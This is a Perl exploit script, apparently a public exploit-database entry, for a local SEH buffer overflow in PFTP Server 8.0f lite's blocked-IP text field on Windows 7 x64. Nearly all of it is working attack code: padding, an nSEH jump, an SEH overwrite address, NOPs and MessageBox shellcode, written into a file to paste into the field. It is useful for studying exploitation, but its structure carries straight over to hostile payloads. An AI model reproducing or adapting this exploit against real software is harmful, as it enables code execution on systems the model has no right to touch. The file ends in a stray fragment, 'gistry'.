#************************************************************************************************************* # # Exploit Title: PFTP Server 8.0f (lite) SEH bypass technique tested on Win7x64 # Date: 8-29-2015 # Software Link: http://www.heise.de/download/the-personal-ftp-server-78679a5e8458e9faa7c5564617bdd4c4-1440883445-267104.html # Exploit Author: Robbie Corley # Contact: c0d3rc0rl3y@gmail.com # Website: # CVE: # Category: Local Exploit # # Description: # There is a textfield within the program that asks for IPs to be blocked against the FTP server that is vulnerable to an SEH based buffer overflow. # # Side Notes: I haven't been able to implement a partial EIP overwrite for ASLR on this exploit, so I had to resort # to manually adding an exception to ASLR in the ret's it. You should then be greeted with a MessageBox. #************************************************************************************************************** my $junk = "A" x 272; #$nseh = "\xcc\xcc\xcc\xcc"; # breakpoint for testing $nseh = "\xeb\x10\x90\x90"; # jump to shellcode $seh = pack('V',0x03033303); # popad, call ebp from \Device\HarddiskVolume1\Windows\Fonts\StaticCache.dat, which is outside the module range and has SEH off #MessageBox Shellc0de #https://www.exploit-db.com/exploits/28996/ my $shellcode = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42". "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03". "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b". "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e". "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c". "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74". "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe". "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; $nops = "\x90" x 20; my $junk2 = "\x90" x 1000; open(myfile,'>buffy.txt'); print myfile $junk.$nseh.$seh.$nops.$shellcode.$junk2; close (myfile);gistry